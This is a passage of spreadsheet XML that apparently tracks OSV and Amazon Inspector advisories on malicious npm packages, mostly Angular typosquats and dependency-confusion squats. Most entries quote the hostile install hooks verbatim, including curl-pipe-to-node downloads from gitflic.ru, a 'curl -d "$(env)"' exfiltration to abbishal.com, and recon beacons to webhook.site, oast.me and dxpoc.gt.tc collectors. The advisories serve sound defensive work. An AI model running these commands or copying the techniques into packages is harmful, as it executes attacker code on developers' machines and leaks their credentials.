## Source: amazon-inspector (1dc3c51d631036eabc2b2933bcf3b7f2c08fe45d193136641e484456ba55a6d9)
Package @angjlar/core impersonates @angular/core: its package.json copies the real Angular project's description ('Angular - the core framework'), author ('angular'), and repository URL (github.com/angular/angular.git), while publishing under the lookalike scope @angjlar. The postinstall lifecycle script in package.json runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js |... node`, fetching unpinned, mutable JavaScript from a non-publisher host (gitflic.ru, proxied through web.archive.org) and piping it to the node interpreter. On `npm install`, this gives the operator of that remote script arbitrary code execution on the installer's machine. The package has no legitimate relationship to Angular; the impersonating metadata exists solely to lure developers who mistype @angular/core into installing the dropper.
</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17534</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17535</t>
        </is>
      </c>
      <c r="D69" s="5" t="inlineStr"/>
      <c r="E69" s="5" t="inlineStr"/>
      <c r="F69" s="5" t="inlineStr"/>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr">
        <is>
          <t>npm:@anguar/core</t>
        </is>
      </c>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr"/>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (428f991afc1ada001d59a546b8290c039dc16c98f6e497346acd87b8c08034eb)
Package @anguar/core impersonates @angular/core: scope name differs by one letter and package.json name, description, author, and repository metadata are copied from the real @angular/core. The package.json declares a postinstall lifecycle hook that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from a gitflic.ru path under the user `hellscripter` (proxied through web.archive.org) and piping it into Node. The remote source is unpinned, unverified, hosted on infrastructure unrelated to the Angular project, and under full control of a third party. Any developer who mistypes the Angular scope and runs `npm install` will execute arbitrary attacker-controlled code on their machine.
</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17535</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17536</t>
        </is>
      </c>
      <c r="D70" s="5" t="inlineStr"/>
      <c r="E70" s="5" t="inlineStr"/>
      <c r="F70" s="5" t="inlineStr"/>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr">
        <is>
          <t>npm:@angulaar/cli</t>
        </is>
      </c>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr"/>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (33d4a58c855f9b549d39f194483ee19730552bbb47a279f73237c8a403708d20)
Package name '@angulaar/cli' (double 'a') is a one-character edit of '@angular/cli'; README, LICENSE headers, and source files are copied verbatim from the real Angular CLI (Google LLC copyright, angular.dev license URLs, README pointing issues to github.com/angular/angular-cli). The manifest's dependencies list has been altered from the upstream package: real @angular/cli depends on '@modelcontextprotocol/sdk', while this package declares '@modelcontextprotocol/server': '2.0.0' and requires it from src/commands/mcp/cli.js and mcp-server.js. '@modelcontextprotocol/server' is not the official MCP package name, so npm install resolves and installs whatever bytes are published under that attacker-chosen name/version, executing any lifecycle scripts in that dependency on the installer's host and loading its code in-process on later `ng mcp` invocations. The lookalike package name, cloned source, and swapped MCP dependency together form a dependency-confusion delivery vector against developers who mistype the real @angular/cli name.
</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17536</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17537</t>
        </is>
      </c>
      <c r="D71" s="5" t="inlineStr"/>
      <c r="E71" s="5" t="inlineStr"/>
      <c r="F71" s="5" t="inlineStr"/>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr">
        <is>
          <t>npm:@angulaar/core</t>
        </is>
      </c>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr"/>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (42861c7641349d2f58380e4f81b13ad9738dd254f224e9f7f239d9cf940cf792)
The package's package.json defines a postinstall lifecycle script that fetches a JavaScript file from a non-publisher host (gitflic.ru, proxied via web.archive.org, at the path /project/hellscripter/install-scripts/blob/raw?file=node.js) and pipes the response directly into node, executing arbitrary remote code on the installer's machine during npm install. The fetched code is unpinned, unverified, and controlled by a third-party account unrelated to the Angular project. The package name @angulaar/core resembles @angular/core, increasing the likelihood of accidental installation.
</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17537</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17538</t>
        </is>
      </c>
      <c r="D72" s="5" t="inlineStr"/>
      <c r="E72" s="5" t="inlineStr"/>
      <c r="F72" s="5" t="inlineStr"/>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr">
        <is>
          <t>npm:@angulr/core</t>
        </is>
      </c>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr"/>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c24dfd4b0a686b9056ff662e6fee53edfe23c7a94a5edf93fb4cace176216518)
The npm package `@angulr/core` masquerades as Angular's `@angular/core` by cloning its package.json metadata (description 'Angular - the core framework', author 'angular', repository angular/angular, ng-update packageGroup) while shipping a hostile `postinstall` script. The postinstall hook runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js |... node`, piping an unpinned, remotely fetched JavaScript payload directly into Node at install time. The destination is a personal `hellscripter` project on gitflic.ru fronted via web.archive.org, unrelated to Angular's publisher. Any developer running `npm install @angulr/core` executes attacker-controlled code with the installer's privileges, with no integrity check and no pinning.
</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17538</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17539</t>
        </is>
      </c>
      <c r="D73" s="5" t="inlineStr"/>
      <c r="E73" s="5" t="inlineStr"/>
      <c r="F73" s="5" t="inlineStr"/>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr">
        <is>
          <t>npm:@angupar/core</t>
        </is>
      </c>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr"/>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (61d3f74118d7ca9e50d79028ad472e56f68c8f86111fb03973a0c01a00b4cd84)
Package impersonates @angular/core (name @angupar/core, author field "angular", repository pointing at github.com/angular/angular, README copied from Angular). Its package.json postinstall script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from a third-party user account (`hellscripter` on gitflic.ru) through a web.archive.org proxy and piping it directly to the installer's Node runtime. The fetch is unpinned, has no integrity check, and resolves to a host unrelated to the Angular project. `npm install @angupar/core` therefore yields arbitrary install-time code execution under attacker control, with the typosquat on @angular/core serving as the delivery lure.
</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17539</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17540</t>
        </is>
      </c>
      <c r="D74" s="5" t="inlineStr"/>
      <c r="E74" s="5" t="inlineStr"/>
      <c r="F74" s="5" t="inlineStr"/>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr">
        <is>
          <t>npm:@anngular/core</t>
        </is>
      </c>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr"/>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (93d2078e85dc301d6b0299c93ff5e0e5e2c717290e88f18de85fce6554f2d027)
Package name @anngular/core (double-n) impersonates @angular/core, copying its description 'Angular - the core framework' and author 'angular'. package.json declares a postinstall lifecycle script: `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`. On `npm install`, this unconditionally fetches an unpinned JavaScript payload from a non-publisher gitflic.ru repository (proxied through web.archive.org to evade host-based filtering) and pipes it directly into node, giving the operator of that gitflic.ru project arbitrary code execution on the installer's machine. The payload is not shipped with the package, is not integrity-pinned, and can be mutated at any time by whoever controls the gitflic.ru project.
</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17540</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17541</t>
        </is>
      </c>
      <c r="D75" s="5" t="inlineStr"/>
      <c r="E75" s="5" t="inlineStr"/>
      <c r="F75" s="5" t="inlineStr"/>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr">
        <is>
          <t>npm:@anuglar/core</t>
        </is>
      </c>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr"/>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5f23ef78cc88817166cff7f8fdf3f1839c610880d960d9394e286da232058f98)
Package name '@anuglar/core' is a one-character transposition of '@angular/core' and copies the legitimate package's description ('Angular - the core framework'), author ('angular'), and repository URL to impersonate it. The package.json postinstall lifecycle script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, downloading arbitrary JavaScript from a third-party host (gitflic.ru, fetched via web.archive.org) and piping it directly into node for execution on `npm install`. The fetched code is unpinned, unhashed, and not shipped in the tarball, so its contents can change at any time and are executed with the privileges of the installing user. The script also references `ps` and `id` for host reconnaissance.
</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17541</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17542</t>
        </is>
      </c>
      <c r="D76" s="5" t="inlineStr"/>
      <c r="E76" s="5" t="inlineStr"/>
      <c r="F76" s="5" t="inlineStr"/>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr">
        <is>
          <t>npm:@inpeek/odata</t>
        </is>
      </c>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr"/>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dad085b4b3e089d6a6d4e6812c66a8b45f10d40bc4ab39ea7bd0ce850d17ed4b)
@inpeek/odata@99.99.100 is a dependency-confusion placeholder published to the public npm registry on the unregistered @inpeek scope with an inflated version (99.99.100) designed to outrank any internal release of the same name. The package.json declares a postinstall lifecycle hook that executes ping.js on `npm install`. ping.js performs an unconditional HTTPS GET to the hardcoded collector URL https://webhook.site/bec9d4b2-8f49-451e-84be-2681cb91ebf2, passing the installer's hostname (os.hostname()), platform (os.platform()), and Node.js version (process.version) as query parameters. index.js throws on require, so any accidental consumer breaks loudly after the postinstall beacon has already fired. The package self-labels as a bug-bounty research placeholder, but the install-time dataflow — automatic transmission of installer host identifiers to a third-party collector the installer did not opt into — is the dependency-confusion exploitation shape and reaches any installer whose tooling resolves @inpeek/* from the public registry.
</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17542</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17543</t>
        </is>
      </c>
      <c r="D77" s="5" t="inlineStr"/>
      <c r="E77" s="5" t="inlineStr"/>
      <c r="F77" s="5" t="inlineStr"/>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr">
        <is>
          <t>npm:@inpeek/odata-angular</t>
        </is>
      </c>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr"/>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (914508dbfa95a3d2cef5aef321a656215797f477c161a8c234e76256db6cac65)
@inpeek/odata-angular@99.99.102 is a dependency-confusion squat on the private @inpeek scope, published to the public npm registry at an inflated version (99.99.102) to win resolution against an internal package of the same name. package.json declares scripts.postinstall as 'node./ping.js'; ping.js issues an HTTPS GET to the third-party collector https://db1b65hgnouukn3qov9gta83zgkdao9dy.oast.me/ carrying os.hostname(), os.platform(), process.version, and the package name as query parameters. index.js throws on require, so the package has no legitimate library function; the only install-time effect is the beacon to the external OAST domain. Any CI job or developer workstation whose resolver picks @inpeek/* from the public registry executes the beacon on npm install and leaks host identifiers to an attacker-controlled destination, regardless of a 'bug bounty research' framing in the description.
</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17543</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17544</t>
        </is>
      </c>
      <c r="D78" s="5" t="inlineStr"/>
      <c r="E78" s="5" t="inlineStr"/>
      <c r="F78" s="5" t="inlineStr"/>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr">
        <is>
          <t>npm:@qngular/core</t>
        </is>
      </c>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr"/>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (e83437986b94381cddff72267bc53907d980e1b14dbfef9123aa47f5ed664664)
Package `@qngular/core` is a one-character typosquat of `@angular/core` and copies the real package's description, author, and repository metadata. The `postinstall` lifecycle script in package.json runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an opaque, non-publisher-controlled JavaScript payload from a third-party host (gitflic.ru via a web.archive.org proxy) and piping it unverified into `node`. This executes attacker-controlled code on the installer's machine during `npm install`.
</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17544</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17545</t>
        </is>
      </c>
      <c r="D79" s="5" t="inlineStr"/>
      <c r="E79" s="5" t="inlineStr"/>
      <c r="F79" s="5" t="inlineStr"/>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr">
        <is>
          <t>npm:abbishal-poc</t>
        </is>
      </c>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr"/>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f3d3f60fb75143a3cdfedea0c2f185e0556053cd458cd5e76cd5303bf406eb32)
On `npm install`, package.json's preinstall hook runs `sh./test.sh`, which uses character-split variable obfuscation (b=e, i=c, s=n, h=u, a=v, l=rl) to reconstruct and execute `curl -d "$(env)" https://abbishal.com/sh/poc`. The script dumps the installer's full process environment — which on CI/CD and developer hosts typically contains cloud credentials (AWS_*), publish tokens (NPM_TOKEN), source-control tokens (GITHUB_TOKEN) and other secrets — and POSTs the contents to the author-controlled domain abbishal.com. The destination is hardcoded and not caller-configurable. In-script comments explicitly describe evading npm's malware scanners, and the README's claims of 'no network requests' and 'no data collection' contradict the actual behavior.
</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17545</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17546</t>
        </is>
      </c>
      <c r="D80" s="5" t="inlineStr"/>
      <c r="E80" s="5" t="inlineStr"/>
      <c r="F80" s="5" t="inlineStr"/>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr">
        <is>
          <t>npm:aria-live-region-helper</t>
        </is>
      </c>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr"/>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (391a9a163273e36e3945f918ea720b8e10aa462b0aa603d4012b28c557c58570)
The package is advertised as an ARIA accessibility helper but ships thunderboltRegistry.js, which executes a top-level IIFE on module load. The IIFE runs shell reconnaissance commands via child_process.execSync (whoami, id, pwd, ifconfig/ip addr, cat /etc/hosts, hostname) and sends their output, together with a beacon containing Node version, process.platform, and PID, via HTTP GET requests to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The package also exports factories under names matching internal Wix thunderbolt registry entry points (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.) and includes a registry-manifest.min.json mapping those names to parastorage.com unpkg URLs, so that a build pipeline resolving any of those registry names to this package triggers the recon-exfiltration side effect on import. Neither the reconnaissance behavior nor the dxpoc.gt.tc destination is related to the package's advertised accessibility purpose.
</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17546</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17547</t>
        </is>
      </c>
      <c r="D81" s="5" t="inlineStr"/>
      <c r="E81" s="5" t="inlineStr"/>
      <c r="F81" s="5" t="inlineStr"/>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr">
        <is>
          <t>npm:css-at-scope-polyfill</t>
        </is>
      </c>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr"/>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c4d8d974b7fabf04fa662971cd8041fb76775bf5ed2902cbbffed0f881e2036d)
Package is published under a CSS-polyfill name but ships thunderboltRegistry.js, which exports Wix internal registry module names (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.) so that a build resolving any of those names will load this file. On require(), an IIFE runs child_process.execSync to collect `id`, `whoami`, `uname`, `ifconfig`/`ip addr`, and the contents of /etc/hosts, plus a beacon containing node version, platform, pid, and hostname, and POSTs the output via fetch to the hardcoded HTTP endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. The payload clears any require.cache entries referencing 'thunderboltRegistry' and acquires child_process through three fallbacks, including instantiating a new Module via module.constructor to bypass mocks or sandboxes. The declared CSS-polyfill purpose has no relation to this behavior; the shape is a dependency-confusion squat against internal Wix modules.
</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17547</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
